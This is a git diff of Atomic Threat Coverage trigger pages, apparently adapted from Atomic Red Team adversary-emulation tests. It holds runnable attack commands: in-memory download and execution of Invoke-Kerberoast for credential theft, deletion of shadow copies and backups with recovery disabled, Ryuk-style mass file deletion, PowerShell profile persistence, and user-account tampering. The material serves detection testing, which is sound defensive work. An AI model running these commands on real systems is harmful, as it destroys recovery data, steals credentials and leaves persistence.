@@ -284,7 +331,7 @@ Create an Alternate Data Stream with PowerShell. Write access is required.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| file_name | File name of file to create ADS on. | string | test.txt|
+| file_name | File name of file to create ADS on. | string | $env:TEMP\T1158_has_ads_powershell.txt|
| ads_filename | Name of ADS file. | string | adstest.txt|
@@ -295,7 +342,6 @@ Create an Alternate Data Stream with PowerShell. Write access is required.
echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test"
set-content -path #{file_name} -stream #{ads_filename} -value "test2"
set-content -path . -stream #{ads_filename} -value "test3"
-ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname
```
#### Cleanup Commands:
@@ -305,6 +351,18 @@ Remove-Item -Path #{file_name} -ErrorAction Ignore
+#### Dependencies: Run with `powershell`!
+##### Description: The file must exist on disk at specified location (#{file_name})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_name}) { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path #{file_name} | Out-Null
+```
+
+
diff --git a/Atomic_Threat_Coverage/Triggers/T1208.md b/Atomic_Threat_Coverage/Triggers/T1208.md
index 968d8d4..fcaded5 100644
--- a/Atomic_Threat_Coverage/Triggers/T1208.md
+++ b/Atomic_Threat_Coverage/Triggers/T1208.md
@@ -21,6 +21,8 @@ This test uses the Powershell Empire Module: https://github.com/EmpireProject/Em
The following are further sources and credits for this attack:
[Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
[Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
+when executed successfully , the test displays available services with their hashes.
+If the testing domain doesn't have any service principal name configured, there is no output
**Supported Platforms:** Windows
@@ -32,7 +34,7 @@ The following are further sources and credits for this attack:
```powershell
-Import-Module .\Invoke-Kerberoast.ps1
+iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1)
Invoke-Kerberoast | fl
```
diff --git a/Atomic_Threat_Coverage/Triggers/T1218.md b/Atomic_Threat_Coverage/Triggers/T1218.md
index ddaac82..3d1d809 100644
--- a/Atomic_Threat_Coverage/Triggers/T1218.md
+++ b/Atomic_Threat_Coverage/Triggers/T1218.md
@@ -232,6 +232,8 @@ msiexec.exe /q /i "#{msi_payload}"
## Atomic Test #6 - Msiexec.exe - Execute Arbitrary DLL
Execute arbitrary DLL file stored locally. Commonly seen in application installation.
+Upon execution, a window titled "Boom!" will open that says "Locked and Loaded!". For 32 bit systems change the dll_payload argument to the Win32 folder.
+By default, if the src folder is not in place, it will download the 64 bit version.
**Supported Platforms:** Windows
@@ -241,7 +243,7 @@ Execute arbitrary DLL file stored locally. Commonly seen in application installa
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll|
+| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\x64\T1218.dll|
#### Attack Commands: Run with `command_prompt`!
@@ -255,7 +257,7 @@ msiexec.exe /y "#{dll_payload}"
#### Dependencies: Run with `powershell`!
-##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
+##### Description: T1218.dll must exist on disk at specified location (#{dll_payload})
##### Check Prereq Commands:
```powershell
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
@@ -263,7 +265,7 @@ if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"
```
diff --git a/Atomic_Threat_Coverage/Triggers/T1220.md b/Atomic_Threat_Coverage/Triggers/T1220.md
index aca6395..37e6986 100644
--- a/Atomic_Threat_Coverage/Triggers/T1220.md
+++ b/Atomic_Threat_Coverage/Triggers/T1220.md
@@ -31,7 +31,7 @@ Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
## Atomic Test #1 - MSXSL Bypass using local files
-Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
+Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off.
**Supported Platforms:** Windows
@@ -84,7 +84,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - MSXSL Bypass using remote files
-Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
+Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off.
**Supported Platforms:** Windows
@@ -132,7 +132,7 @@ Executes the code specified within a XSL script using a local payload.
```cmd
-wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}
+wmic #{wmic_command} /FORMAT:"#{local_xsl_file}"
```
@@ -157,7 +157,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - WMIC bypass using remote XSL file
-Executes the code specified within a XSL script using a remote payload.
+Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test sucessfully executed, while AV turned off.
**Supported Platforms:** Windows
@@ -175,7 +175,7 @@ Executes the code specified within a XSL script using a remote payload.
```cmd
-wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
+wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}"
```
diff --git a/Atomic_Threat_Coverage/Triggers/T1485.md b/Atomic_Threat_Coverage/Triggers/T1485.md
index 66d0d18..f7b2f8b 100644
--- a/Atomic_Threat_Coverage/Triggers/T1485.md
+++ b/Atomic_Threat_Coverage/Triggers/T1485.md
@@ -8,103 +8,16 @@ To maximize impact on the target organization in operations where network-wide a
## Atomic Tests
-- [Atomic Test #1 - Windows - Delete Volume Shadow Copies](#atomic-test-1---windows---delete-volume-shadow-copies)
+- [Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-1---windows---overwrite-file-with-sysinternals-sdelete)
-- [Atomic Test #2 - Windows - Delete Windows Backup Catalog](#atomic-test-2---windows---delete-windows-backup-catalog)
-
-- [Atomic Test #3 - Windows - Disable Windows Recovery Console Repair](#atomic-test-3---windows---disable-windows-recovery-console-repair)
-
-- [Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-4---windows---overwrite-file-with-sysinternals-sdelete)
-
-- [Atomic Test #5 - macOS/Linux - Overwrite file with DD](#atomic-test-5---macoslinux---overwrite-file-with-dd)
-
-- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
+- [Atomic Test #2 - macOS/Linux - Overwrite file with DD](#atomic-test-2---macoslinux---overwrite-file-with-dd)
-## Atomic Test #1 - Windows - Delete Volume Shadow Copies
-Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-vssadmin.exe delete shadows /all /quiet
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #2 - Windows - Delete Windows Backup Catalog
-Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-wbadmin.exe delete catalog -quiet
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #3 - Windows - Disable Windows Recovery Console Repair
-Disables repair by the Windows Recovery Console on boot.
-This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
-bcdedit.exe /set {default} recoveryenabled no
-```
-
-#### Cleanup Commands:
-```cmd
-bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
-bcdedit.exe /set {default} recoveryenabled yes
-```
-
-
-
-
-
-
-
-
-## Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete
-Overwrites and deletes a file using Sysinternals SDelete.
-Requires the download of either Sysinternals Suite or the individual SDelete utility.
+## Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete
+Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in
+the powershell session along with other information about the file that was deleted.
**Supported Platforms:** Windows
@@ -114,15 +27,15 @@ Requires the download of either Sysinternals Suite or the individual SDelete uti
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| sdelete_exe | Path of sdelete executable | Path | PathToAtomicsFolder\T1485\bin\sdelete.exe|
+| sdelete_exe | Path of sdelete executable | Path | $env:TEMP\Sdelete\sdelete.exe|
+| file_to_delete | Path of file to delete | path | $env:TEMP\T1485.txt|
#### Attack Commands: Run with `powershell`!
```powershell
-New-Item $env:TEMP\T1485.txt
-#{sdelete_exe} -accepteula $env:TEMP\T1485.txt
+Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"
```
@@ -132,14 +45,22 @@ New-Item $env:TEMP\T1485.txt
##### Description: Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{sdelete_exe}) {0} else {1}
+if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
-New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null
-Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
+Remove-Item $env:TEMP\SDelete.zip -Force
+```
+##### Description: The file to delete must exist at #{file_to_delete}
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+New-Item #{file_to_delete} -Force | Out-Null
```
@@ -148,7 +69,7 @@ Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
-## Atomic Test #5 - macOS/Linux - Overwrite file with DD
+## Atomic Test #2 - macOS/Linux - Overwrite file with DD
Overwrites and deletes a file using DD.
To stop the test, break the command with CTRL/CMD+C.
@@ -176,28 +97,4 @@ dd of=#{file_to_overwrite} if=#{overwrite_source}
-
-
-
-## Atomic Test #6 - Windows - Delete Backup Files
-Deletes backup files in a manner similar to Ryuk ransomware.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
-```
-
-
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Triggers/T1489.md b/Atomic_Threat_Coverage/Triggers/T1489.md
index 24ab489..c0e7b2e 100644
--- a/Atomic_Threat_Coverage/Triggers/T1489.md
+++ b/Atomic_Threat_Coverage/Triggers/T1489.md
@@ -16,7 +16,9 @@ Adversaries may accomplish this by disabling individual services of high importa
## Atomic Test #1 - Windows - Stop service using Service Controller
-Stops a specified service using the sc.exe command.
+Stops a specified service using the sc.exe command. Upon execution, if the spooler service was running infomration will be displayed saying
+it has changed to a state of STOP_PENDING. If the spooler service was not running "The service has not been started." will be displayed and it can be
+started by running the cleanup command.
**Supported Platforms:** Windows
@@ -49,7 +51,9 @@ sc.exe start #{service_name}
## Atomic Test #2 - Windows - Stop service using net.exe
-Stops a specified service using the net.exe command.
+Stops a specified service using the net.exe command. Upon execution, if the service was running "The Print Spooler service was stopped successfully."
+will be displayed. If the service was not running, "The Print Spooler service is not started." will be displayed and it can be
+started by running the cleanup command.
**Supported Platforms:** Windows
@@ -82,8 +86,10 @@ net.exe start #{service_name}
## Atomic Test #3 - Windows - Stop service by killing process
-Stops a specified service killng the service's process.
-This technique was used by WannaCry.
+Stops a specified service killng the service's process.
+This technique was used by WannaCry. Upon execution, if the spoolsv service was running "SUCCESS: The process "spoolsv.exe" with PID 2316 has been terminated."
+will be displayed. If the service was not running "ERROR: The process "spoolsv.exe" not found." will be displayed and it can be
+started by running the cleanup command.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1490.md b/Atomic_Threat_Coverage/Triggers/T1490.md
index 3fde178..d0bf847 100644
--- a/Atomic_Threat_Coverage/Triggers/T1490.md
+++ b/Atomic_Threat_Coverage/Triggers/T1490.md
@@ -21,11 +21,18 @@ A number of native Windows utilities have been used by adversaries to disable or
- [Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell](#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell)
+- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
+
## Atomic Test #1 - Windows - Delete Volume Shadow Copies
-Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
+Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon
+execution, if no shadow volumes exist the message "No items found that satisfy the query." will be displayed. If shadow volumes are present, it
+will delete them without printing output to the screen. This is because the /quiet parameter was passed which also suppresses the y/n
+confirmation prompt. Shadow copies can only be created on Windows server or Windows 8.
+
+https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11)
**Supported Platforms:** Windows
@@ -43,6 +50,18 @@ vssadmin.exe delete shadows /all /quiet
+#### Dependencies: Run with `powershell`!
+##### Description: Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8.
+##### Check Prereq Commands:
+```powershell
+if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+vssadmin.exe create shadow /for=c:
+```
+
+
@@ -50,6 +69,7 @@ vssadmin.exe delete shadows /all /quiet
## Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMI
Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
+Shadow copies can only be created on Windows server or Windows 8.
**Supported Platforms:** Windows
@@ -73,7 +93,8 @@ wmic.exe shadowcopy delete
## Atomic Test #3 - Windows - Delete Windows Backup Catalog
-Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
+Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution,
+"The backup catalog has been successfully deleted." will be displayed in the PowerShell session.
**Supported Platforms:** Windows
@@ -97,8 +118,8 @@ wbadmin.exe delete catalog -quiet
## Atomic Test #4 - Windows - Disable Windows Recovery Console Repair
-Disables repair by the Windows Recovery Console on boot.
-This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
+Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
+Upon execution, "The operation completed successfully." will be displayed in the powershell session.
**Supported Platforms:** Windows
@@ -114,6 +135,11 @@ bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
```
+#### Cleanup Commands:
+```cmd
+bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
+bcdedit.exe /set {default} recoveryenabled yes
+```
@@ -123,9 +149,35 @@ bcdedit.exe /set {default} recoveryenabled no
## Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell
-Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
+Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
This technique is used by numerous ransomware families such as Sodinokibi/REvil.
-Executes Get-WMIObject
+Executes Get-WMIObject. Shadow copies can only be created on Windows server or Windows 8, so upon execution
+there may be no output displayed.
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #6 - Windows - Delete Backup Files
+Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try
+to delete files from around the system.
**Supported Platforms:** Windows
@@ -137,7 +189,7 @@ Executes Get-WMIObject
```cmd
-powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"
+del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
```
diff --git a/Atomic_Threat_Coverage/Triggers/T1502.md b/Atomic_Threat_Coverage/Triggers/T1502.md
index 1f6dbeb..5030475 100644
--- a/Atomic_Threat_Coverage/Triggers/T1502.md
+++ b/Atomic_Threat_Coverage/Triggers/T1502.md
@@ -15,6 +15,9 @@ Explicitly assigning the PPID may also enable [Privilege Escalation](https://att
## Atomic Test #1 - Parent PID Spoofing using PowerShell
This test uses PowerShell to replicates how Cobalt Strike does ppid spoofing and masquerade a spawned process.
+Upon execution, "Process C:\Program Files\Internet Explorer\iexplore.exe is spawned with pid ####" will be displayed and
+calc.exe will be launched.
+
Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/PPID-Spoof.ps1)
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1504.md b/Atomic_Threat_Coverage/Triggers/T1504.md
index 05fa4c6..7e24322 100644
--- a/Atomic_Threat_Coverage/Triggers/T1504.md
+++ b/Atomic_Threat_Coverage/Triggers/T1504.md
@@ -14,7 +14,7 @@ An adversary may also be able to escalate privileges if a script in a PowerShell
## Atomic Test #1 - Append malicious start-process cmdlet
-Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable
+Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
@@ -32,14 +32,9 @@ Appends a start process cmdlet to the current user's powershell profile pofile t
```powershell
-if(Test-Path #{ps_profile}){
-}
-else{
- New-Item -Path #{ps_profile} -Type File -Force
-}
-$malicious = "Start-Process #{exe_path}"
-Add-Content #{ps_profile} -Value $malicious
-powershell -command exit
+Add-Content #{ps_profile} -Value ""
+Add-Content #{ps_profile} -Value "Start-Process #{exe_path}"
+powershell -Command exit
```
#### Cleanup Commands:
@@ -50,6 +45,18 @@ Set-Content $profile -Value $oldprofile
+#### Dependencies: Run with `powershell`!
+##### Description: Ensure a powershell profile exists for the current user
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path #{ps_profile} -Type File -Force
+```
+
+
diff --git a/Atomic_Threat_Coverage/Triggers/T1518.md b/Atomic_Threat_Coverage/Triggers/T1518.md
index 36b4531..b22d2b7 100644
--- a/Atomic_Threat_Coverage/Triggers/T1518.md
+++ b/Atomic_Threat_Coverage/Triggers/T1518.md
@@ -12,7 +12,8 @@
## Atomic Test #1 - Find and Display Internet Explorer Browser Version
-Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
+Query the registry to determine the version of internet explorer installed on the system.
+Upon execution, version information about internet explorer will be displayed.
**Supported Platforms:** Windows
@@ -36,7 +37,8 @@ reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersio
## Atomic Test #2 - Applications Installed
-Adversaries may attempt to get a listing of all software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
+Query the registry to determine software and versions installed on the system. Upon execution a table of
+software name and version information will be displayed.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1531.md b/Atomic_Threat_Coverage/Triggers/T1531.md
index a41ee07..61f31b7 100644
--- a/Atomic_Threat_Coverage/Triggers/T1531.md
+++ b/Atomic_Threat_Coverage/Triggers/T1531.md
@@ -14,7 +14,8 @@ Adversaries may also subsequently log off and/or reboot boxes to set malicious c
## Atomic Test #1 - Change User Password - Windows
-Changes the user password to hinder access attempts. Seen in use by LockerGoga.
+Changes the user password to hinder access attempts. Seen in use by LockerGoga. Upon execution, log into the user account "AtomicAdministrator" with
+the password "HuHuHUHoHo283283".
**Supported Platforms:** Windows
@@ -61,7 +62,7 @@ net user #{user_account} #{new_user_password} /add
## Atomic Test #2 - Delete User - Windows
-Deletes a user account to prevent access.
+Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted.
**Supported Platforms:** Windows
diff --git a/analytics/generated/attack_navigator_profiles/atc_attack_navigator_profile.json b/analytics/generated/attack_navigator_profiles/atc_attack_navigator_profile.json
index 64f96ea..ebb4ada 100644
--- a/analytics/generated/attack_navigator_profiles/atc_attack_navigator_profile.json
+++ b/analytics/generated/attack_navigator_profiles/atc_attack_navigator_profile.json
@@ -1 +1 @@
-{"name": "ATC-Export", "version": "2.1", "domain": "mitre-enterprise", "description": "", "filters": {"stages": ["act"], "platforms": ["linux", "windows"]}, "sorting": 0, "viewMode": 0, "hideDisabled": true, "techniques": [{"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1212", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1114", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1114", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1107", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1066", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0195", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1210", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1210", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1190", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1190", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1136", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1099", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1210", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1054", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1212", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1208", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1178", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1178", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1089", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1212", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": 